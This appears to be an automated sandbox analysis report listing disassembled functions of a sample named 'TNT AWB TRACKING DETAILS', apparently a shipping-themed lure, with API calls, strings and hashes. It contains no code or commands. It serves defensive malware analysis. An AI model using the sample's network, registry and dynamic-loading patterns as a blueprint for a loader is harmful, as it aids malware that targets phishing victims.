                                                    • API String ID: 2532777613-1756721700
                                                    • Opcode ID: 3d355db1be01279d6458a7160fe10bfb92cc335270752d3d2e3830ac355f3e56
                                                    • Instruction ID: 60486430f7925fdd6dba3b54eee5de72f2fc3db71a72f73c3177ad9bb7a102db
                                                    • Opcode Fuzzy Hash: 3d355db1be01279d6458a7160fe10bfb92cc335270752d3d2e3830ac355f3e56
                                                    • Instruction Fuzzy Hash: 2F51A171900309DBDB24CF95C941BEAB7F4EF44314F20956FE54AEB251E7B0AA85DB40
                                                    Function 00F1D56C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121comlibraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00F1D5D4
                                                    • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00F1D60A
                                                    • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00F1D61B
                                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00F1D69D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$AddressCreateInstanceProc
                                                    • String ID: DllGetClassObject
                                                    • API String ID: 753597075-1075368562
                                                    • Opcode ID: 5d94d748c103a6bbba847c9b4502af4fdb377cb842196f57750c531ad3669077
                                                    • Instruction ID: cdeb759e147366b894087d3ea4a1a57b167022174022558d76f39b16cc9a361d
                                                    • Opcode Fuzzy Hash: 5d94d748c103a6bbba847c9b4502af4fdb377cb842196f57750c531ad3669077
                                                    • Instruction Fuzzy Hash: 16419FB2600204EFDB05DF64C884BDA7BB9EF44314F1581A9ED099F24AD7B1DD84EBA0
                                                    Function 00F22753 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _memset.LIBCMT ref: 00F227C0
                                                    • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00F227DC
                                                    • DeleteMenu.USER32(?,00000007,00000000), ref: 00F22822
                                                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00F85890,00000000), ref: 00F2286B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Menu$Delete$InfoItem_memset
                                                    • String ID: 0
                                                    • API String ID: 1173514356-4108050209
                                                    • Opcode ID: d62eee754ac5f99fb4761e6030e9d70f4ea9516e29ccc350e74abeb2cfcc3e31
                                                    • Instruction ID: 3f1320756f60794d3af0a6b12f684de2f7fe8c7ff9f15eb15647b9cd64435a65
                                                    • Opcode Fuzzy Hash: d62eee754ac5f99fb4761e6030e9d70f4ea9516e29ccc350e74abeb2cfcc3e31
                                                    • Instruction Fuzzy Hash: F141EF71604351AFD760DF24EC44FAABBE8EF85320F04492EF8A697291C770E805DB52
                                                    Function 00F3D7A5 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00F3D7C5
                                                      • Part of subcall function 00EC784B: _memmove.LIBCMT ref: 00EC7899
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: BuffCharLower_memmove
                                                    • String ID: cdecl$none$stdcall$winapi
                                                    • API String ID: 3425801089-567219261
                                                    • Opcode ID: 06c41d71f33124f520fc5edc888f9998c1b6d07c070fa4c7d2e681af7c07fa70
                                                    • Instruction ID: ce175379ebc1715163bf7a382b8cd2fd6dafc44efaff3a43d920458a1ce97759
                                                    • Opcode Fuzzy Hash: 06c41d71f33124f520fc5edc888f9998c1b6d07c070fa4c7d2e681af7c07fa70
                                                    • Instruction Fuzzy Hash: 9931B071904219ABCF00EFA4CD519AEB3F4FF04330F00866AE869A72D1DB71A946DB80
                                                    Function 00F18E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00EC7DE1: _memmove.LIBCMT ref: 00EC7E22
                                                      • Part of subcall function 00F1AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00F1AABC
                                                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00F18F14
                                                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00F18F27
                                                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 00F18F57
                                                      • Part of subcall function 00EC7BCC: _memmove.LIBCMT ref: 00EC7C06
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$_memmove$ClassName
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 365058703-1403004172
                                                    • Opcode ID: 4f9437adab567ecad2ccc7cbfabe0fdcf3a2f3a6efb1486ae3a301f2115a4a08
                                                    • Instruction ID: 7a2fc6957893b1ee1d1d76edfb6aad707483552576ebca2bace629a0fceb3bb6
                                                    • Opcode Fuzzy Hash: 4f9437adab567ecad2ccc7cbfabe0fdcf3a2f3a6efb1486ae3a301f2115a4a08
                                                    • Instruction Fuzzy Hash: A5210675901108BADB14ABB0CD85DFF77A9DF463A0F14412DF825A71E0DF39588BAA10
                                                    Function 00F3182D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00F3184C
                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F31872
                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00F318A2
                                                    • InternetCloseHandle.WININET(00000000), ref: 00F318E9
                                                      • Part of subcall function 00F32483: GetLastError.KERNEL32(?,?,00F31817,00000000,00000000,00000001), ref: 00F32498
                                                      • Part of subcall function 00F32483: SetEvent.KERNEL32(?,?,00F31817,00000000,00000000,00000001), ref: 00F324AD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                    • String ID:
                                                    • API String ID: 3113390036-3916222277
                                                    • Opcode ID: 711024574c0c1207ac848f99f1dcec9ecd92af98873767d4495173cb1a4ec956
                                                    • Instruction ID: 762211e27876f925e1d4776c85857e57a6593d79602366fd67326aa27bebb265
                                                    • Opcode Fuzzy Hash: 711024574c0c1207ac848f99f1dcec9ecd92af98873767d4495173cb1a4ec956
                                                    • Instruction Fuzzy Hash: C921BEB190020CBFEB119B64CC85EBF77EDFB49764F10412AF805A2240EA288D08A7B4
                                                    Function 00F463E7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00EC1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00EC1D73
                                                      • Part of subcall function 00EC1D35: GetStockObject.GDI32(00000011), ref: 00EC1D87
                                                      • Part of subcall function 00EC1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00EC1D91
                                                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00F46461
                                                    • LoadLibraryW.KERNEL32(?), ref: 00F46468
                                                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00F4647D
                                                    • DestroyWindow.USER32(?), ref: 00F46485
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                    • String ID: SysAnimate32
                                                    • API String ID: 4146253029-1011021900
                                                    • Opcode ID: 30a43d1ac39c1b804e6f161c7e0c6c26d3b6344efb76f56dd08410082f689266
                                                    • Instruction ID: 53230b49e7014f50192c3e147167df13a637c33f13e76046100354e3b6c52822
                                                    • Opcode Fuzzy Hash: 30a43d1ac39c1b804e6f161c7e0c6c26d3b6344efb76f56dd08410082f689266
                                                    • Instruction Fuzzy Hash: 17218E75500209ABEF108FA4DC40EBA3BA9EB5A374F104629FD14D21A0D775DC51B762
                                                    Function 00F26D9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetStdHandle.KERNEL32(0000000C), ref: 00F26DBC
                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00F26DEF
                                                    • GetStdHandle.KERNEL32(0000000C), ref: 00F26E01
                                                    • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00F26E3B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: CreateHandle$FilePipe
                                                    • String ID: nul
                                                    • API String ID: 4209266947-2873401336
                                                    • Opcode ID: d1b7aa178d013db379703c91a3d7257b23f7c77639ca6513886e79cc4a3a64ed
                                                    • Instruction ID: 4bce29c621f432d4d7352eaff55757532d44c1e3250fcb6ccd84987c975dd0df
                                                    • Opcode Fuzzy Hash: d1b7aa178d013db379703c91a3d7257b23f7c77639ca6513886e79cc4a3a64ed
                                                    • Instruction Fuzzy Hash: CB21B275A0022DABDB209F69EC04A9A77F4EF95730F204A19FCA0D72D0D7709915AB54
                                                    Function 00F26E6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00F26E89
                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00F26EBB
                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00F26ECC
                                                    • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00F26F06
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: CreateHandle$FilePipe
                                                    • String ID: nul
                                                    • API String ID: 4209266947-2873401336
                                                    • Opcode ID: ed8d6e9d5673b17ebdea62a1223daeecadacef2146f8c42865ae5d5c434e3989
                                                    • Instruction ID: 4e8a0c04c05d8f5ead7adc399ed90ac45c860fe2a9dd4a14e2ac952bdd192aa0
                                                    • Opcode Fuzzy Hash: ed8d6e9d5673b17ebdea62a1223daeecadacef2146f8c42865ae5d5c434e3989
                                                    • Instruction Fuzzy Hash: 512107799007259BDB209F69EC04A9A77E8EF55730F200B19FCA0D72D0D7B0E951EB54
                                                    Function 00F2AC40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 00F2AC54
                                                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00F2ACA8
                                                    • __swprintf.LIBCMT ref: 00F2ACC1
                                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000,00F4F910), ref: 00F2ACFF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$InformationVolume__swprintf
                                                    • String ID: %lu
                                                    • API String ID: 3164766367-685833217
                                                    • Opcode ID: 7c0be13f2347b30e62b71e3cd656ce6d9b765047c43c173c39511f6e122ad5b4
                                                    • Instruction ID: 99ea6e364089ae011704aa32e16b0ec8a628da37b90b0a6651f0cfdf2fae2ed0
                                                    • Opcode Fuzzy Hash: 7c0be13f2347b30e62b71e3cd656ce6d9b765047c43c173c39511f6e122ad5b4
                                                    • Instruction Fuzzy Hash: ED21A135A0010DAFCB10DF64DD45EAE7BF8EF89314B0040A9F909EB252DA31EA45DB21
                                                    Function 00F21AE8 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CharUpperBuffW.USER32(?,?), ref: 00F21B19
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: BuffCharUpper
                                                    • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                    • API String ID: 3964851224-769500911
                                                    • Opcode ID: 6d049b25f74ad8ec22d3198ac3dbce4545eb31f0bc910d8c33158b346dad3fb3
                                                    • Instruction ID: 0c8006cb0e839eb07be04651253bb61f883611f4ed89b9eebbd091d48838a336
                                                    • Opcode Fuzzy Hash: 6d049b25f74ad8ec22d3198ac3dbce4545eb31f0bc910d8c33158b346dad3fb3
                                                    • Instruction Fuzzy Hash: 78118B3194029C8FCF00EFA4E8519EEB3F4FF66314B1484A9D818A7692EB325D47EB54
                                                    Function 00F3EB55 Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00F3EC07
                                                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00F3EC37
                                                    • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00F3ED6A
                                                    • CloseHandle.KERNEL32(?), ref: 00F3EDEB
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                    • String ID:
                                                    • API String ID: 2364364464-0
                                                    • Opcode ID: 1e894255bba1be060884453df87cac8ec306be0f009db708da8141d25eec6cf7
                                                    • Instruction ID: 91c3f51db11eb41b1fc9fcc9a3b230f025e71e56ee0fe9e5a2504ce605c29f75
                                                    • Opcode Fuzzy Hash: 1e894255bba1be060884453df87cac8ec306be0f009db708da8141d25eec6cf7
                                                    • Instruction Fuzzy Hash: F78151716043009FD724EF28C946F6AB7E5AF94720F14881DF99AEB2D2DA71AC41CB52
                                                    Function 00F40037 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00EC7DE1: _memmove.LIBCMT ref: 00EC7E22
                                                      • Part of subcall function 00F40E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F3FDAD,?,?), ref: 00F40E31
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F400FD
                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F4013C
                                                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00F40183
                                                    • RegCloseKey.ADVAPI32(?,?), ref: 00F401AF
                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00F401BC
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                    • String ID:
                                                    • API String ID: 3440857362-0
                                                    • Opcode ID: f9f473f7f759cf0c4fafa96db4365c7dc429b067da1d9347d136568881b6a0a0
                                                    • Instruction ID: 94c70de022ab45297830acd7aaf67c598299b6cbbd3d20bd800bf6952468011d
                                                    • Opcode Fuzzy Hash: f9f473f7f759cf0c4fafa96db4365c7dc429b067da1d9347d136568881b6a0a0
                                                    • Instruction Fuzzy Hash: A8517C72608204AFD704EF68CD81F6ABBE9FF84314F00492DF995972A2DB31E945DB52
                                                    Function 00F3D8C8 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00EC9837: __itow.LIBCMT ref: 00EC9862
                                                      • Part of subcall function 00EC9837: __swprintf.LIBCMT ref: 00EC98AC
                                                    • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00F3D927
                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00F3D9AA
                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00F3D9C6
                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00F3DA07
                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00F3DA21
                                                      • Part of subcall function 00EC5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00F27896,?,?,00000000), ref: 00EC5A2C
                                                      • Part of subcall function 00EC5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00F27896,?,?,00000000,?,?), ref: 00EC5A50
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                    • String ID:
                                                    • API String ID: 327935632-0
                                                    • Opcode ID: 844cc69a2ed964f3c6133ae4b008d5e1111061051b3712675729d50869723f98
                                                    • Instruction ID: cc28fc60bbb0c9524f440b524bdad14f5af4e14f33d46ba68e5ade7ff3742655
                                                    • Opcode Fuzzy Hash: 844cc69a2ed964f3c6133ae4b008d5e1111061051b3712675729d50869723f98
                                                    • Instruction Fuzzy Hash: 6B510636A00209DFCB00EFA8D584EADB7F5FF59320B048069E859AB312DB35AD46DB50
                                                    Function 00F2E571 Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00F2E61F
                                                    • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00F2E648
                                                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00F2E687
                                                      • Part of subcall function 00EC9837: __itow.LIBCMT ref: 00EC9862
                                                      • Part of subcall function 00EC9837: __swprintf.LIBCMT ref: 00EC98AC
                                                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00F2E6AC
                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00F2E6B4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                    • String ID:
                                                    • API String ID: 1389676194-0
                                                    • Opcode ID: 58be470e627345b5273e9b1367a13b1f5c7d6726a4a8e3da8a0f4ac265fc135b
                                                    • Instruction ID: c8e9ef55352b8ca6654e8e73489de31d0ddeb55241da28d139027a81abda897b
                                                    • Opcode Fuzzy Hash: 58be470e627345b5273e9b1367a13b1f5c7d6726a4a8e3da8a0f4ac265fc135b
